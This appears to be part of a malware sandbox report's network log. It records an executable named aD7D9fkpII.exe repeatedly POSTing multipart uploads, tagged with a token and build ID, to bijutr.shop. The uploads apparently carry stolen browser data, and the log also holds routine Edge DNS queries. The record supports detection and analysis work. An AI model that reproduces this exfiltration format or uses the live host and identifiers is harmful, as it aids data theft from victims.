                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                        Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:31 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        15192.168.2.549782188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:31 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----Q9R1NG4OZU37YM7GV37Y
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 493
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:31 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 52 31 4e 47 34 4f 5a 55 33 37 59 4d 37 47 56 33 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 51 39 52 31 4e 47 34 4f 5a 55 33 37 59 4d 37 47 56 33 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 51 39 52 31 4e 47 34 4f 5a 55 33 37 59 4d 37 47 56 33 37 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------Q9R1NG4OZU37YM7GV37YContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------Q9R1NG4OZU37YM7GV37YContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------Q9R1NG4OZU37YM7GV37YCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:32 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        16192.168.2.549809188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:38 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----L6XBA1NYM7G47Q9000R1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 509
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:38 UTC509OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 41 31 4e 59 4d 37 47 34 37 51 39 30 30 30 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------L6XBA1NYM7G47Q9000R1Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------L6XBA1NYM7G47Q9000R1Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:39 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        17192.168.2.549820172.64.41.34437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:39 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                        CF-RAY: 8f878ca18976426d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        18192.168.2.549821172.64.41.34437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:40 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                        CF-RAY: 8f878ca22b25c42c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ca 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        19192.168.2.549819188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BA168GLN7QIEUAAIWBI5
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 207993
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------BA168GLN7QIEUAAIWBI5Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------BA168GLN7QIEUAAIWBI5Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------BA168GLN7QIEUAAIWBI5Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
